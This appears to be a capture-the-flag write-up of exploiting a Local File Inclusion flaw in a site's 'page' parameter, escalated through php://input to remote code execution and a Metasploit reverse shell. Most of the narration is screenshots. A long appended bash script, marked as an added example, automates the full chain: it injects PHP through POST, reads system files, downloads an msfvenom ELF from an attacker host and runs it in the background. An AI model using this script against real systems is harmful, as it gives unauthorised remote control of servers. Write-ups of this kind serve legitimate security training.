# Exploitation

I started playing with the "page" parameter of the website and used LFISuite to try different file paths to see whether it was actually vulnerable to Local File Inclusion.

![](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2Fzdxr0JkBwU7jXkL1hzvl%2F2022-07-06_12-20.png?alt=media\&token=f2e365f4-96e1-462e-b10d-dd02d4ba4159)

As you can see, I was able to read the access logs for the web server. These are probably all my requests going out, lol.

My favorite tool to use for Local File Inclusion is kadimus. It runs a series of checks to determine whether the LFI can be escalated to remote code execution through different techniques (for example the `php://input` and `data://` wrappers, or `/proc/self/environ`).

![](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2FLhQfbKJG2aMHPpEItOgT%2F2022-07-06_12-31.png?alt=media\&token=e2201af8-04b1-43cb-a26b-18723795dae8)

The application is vulnerable to `php://input` Remote Code Execution: including `php://input` makes the server read the raw POST body as PHP source and execute it. Note that this only works when `allow_url_include` is enabled in the PHP configuration, which is why kadimus tests for it explicitly rather than assuming it.

To test this out I will make the application output something random.

![I made the machine output "pwned"](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2Fjg5q3w9z5Fw6IveKj48E%2F2022-07-06_12-31_1.png?alt=media\&token=de98ff4d-1092-4c8d-9562-0cb30549fee9)

We can take this further to run arbitrary commands and obtain a reverse shell.

![](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2FHQLc3BaDEEYpr5z9MusK%2F2022-07-06_12-37.png?alt=media\&token=799774af-4f6a-467a-94df-722916a43d28)

First I wanted to confirm the architecture of the system so I could generate a matching reverse shell with msfvenom, then download it to the target and execute it there.

![](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2Fo1syXhjusvxiuDJ58I4w%2F2022-07-06_12-43.png?alt=media\&token=bf29f4d8-b6e7-4100-b9eb-bbe550815526)

Started a Python web server on port 443.

![](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2FTQ66tRcze7O9GPohTZKR%2F2022-07-06_12-43_1.png?alt=media\&token=03d0e0f7-5b88-450a-802c-734f21e6a53e)

![](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2FsHRNXSzih9xKgDZLLWzn%2F2022-07-06_12-44.png?alt=media\&token=9ce4c0a7-a379-40a5-bccf-8444bb2bf510)

We see that we were able to download the reverse shell onto the machine; all that was left was to execute it while my multi/handler in Metasploit was listening.

![](https://328597950-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC01qT6YExS9JZIncykrV%2Fuploads%2Fa5O9tOKduujSGsOLXlKw%2F2022-07-06_13-38.png?alt=media\&token=56ae6030-6a42-475a-9918-303aeaa503f0)

And boom. Reverse shell.
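The whole chain above, scripted, as an added example that is not part of the original write-up or of kadimus. It assumes a target URL, parameter name, attacker IP and port that are placeholders (the write-up does not give them), and that the vulnerable include is reachable with `page=php://input` exactly as kadimus reported. Each command is wrapped in PHP that base64-encodes its output between markers, so multi-line output survives the trip through the page's HTML; the reverse shell is launched with `nohup ... &` because otherwise the `curl` call would block for as long as the shell lives.

```shell
#!/usr/bin/env bash
# Added example (not the write-up's code): LFI via page=php://input -> RCE -> staged reverse shell.
# Assumed values: TARGET, PARAM, LHOST, LPORT are placeholders, override them via the environment.
set -euo pipefail

TARGET="${TARGET:-http://10.10.10.10/index.php}"   # assumed target
PARAM="${PARAM:-page}"                               # vulnerable parameter from the write-up
LHOST="${LHOST:-10.10.14.5}"                         # assumed attacker IP
LPORT="${LPORT:-4444}"                               # assumed handler port
WEBPORT="${WEBPORT:-443}"                            # python http.server port from the write-up

# Build the PHP that include('php://input') will execute. The command output is
# base64-encoded between markers so it can be cut out of the HTML and decoded.
# (The command must not contain double quotes; it is dropped into a PHP string.)
php_payload() {
    printf '<?php echo "--BEGIN--".base64_encode(shell_exec("%s"))."--END--"; ?>' "$1"
}

# Pull the base64 blob out of a response body (read from stdin) and decode it.
extract_output() {
    sed -n 's/.*--BEGIN--\([A-Za-z0-9+\/=]*\)--END--.*/\1/p' | base64 -d
}

# Run one shell command on the target through the php://input include.
# Requires allow_url_include=On on the server, which kadimus already confirmed.
lfi_exec() {
    curl -s -X POST "${TARGET}?${PARAM}=php://input" \
        --data-binary "$(php_payload "$1")" | extract_output
}

# Map the target's `uname -m` to an msfvenom payload; unknown arches are an error, not a guess.
payload_for_arch() {
    case "$1" in
        x86_64) echo linux/x64/meterpreter/reverse_tcp ;;
        i?86)   echo linux/x86/meterpreter/reverse_tcp ;;
        *)      echo "unhandled architecture: $1" >&2; return 1 ;;
    esac
}

stage_shell() {
    arch="$(lfi_exec 'uname -m')"
    payload="$(payload_for_arch "$arch")"
    msfvenom -p "$payload" LHOST="$LHOST" LPORT="$LPORT" -f elf -o shell.elf

    # In separate terminals before continuing (port 443 needs root for http.server):
    #   sudo python3 -m http.server "$WEBPORT"
    #   msfconsole -q -x "use exploit/multi/handler; set payload $payload; set LHOST $LHOST; set LPORT $LPORT; run"
    lfi_exec "wget -q http://${LHOST}:${WEBPORT}/shell.elf -O /tmp/shell.elf && chmod +x /tmp/shell.elf && ls -l /tmp/shell.elf"

    # Background the shell so the HTTP request returns and the handler catches the callback.
    lfi_exec "nohup /tmp/shell.elf >/dev/null 2>&1 &"
}

# Only fire the chain when invoked with "run", so sourcing the file for the helpers is harmless.
if [ "${1:-}" = "run" ]; then
    stage_shell
fi
```

`lfi_exec 'id'` or `lfi_exec 'cat /etc/passwd'` are enough to confirm the RCE on their own before staging anything; `payload_for_arch` deliberately fails closed on an architecture it does not know rather than shipping an ELF that will not run.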
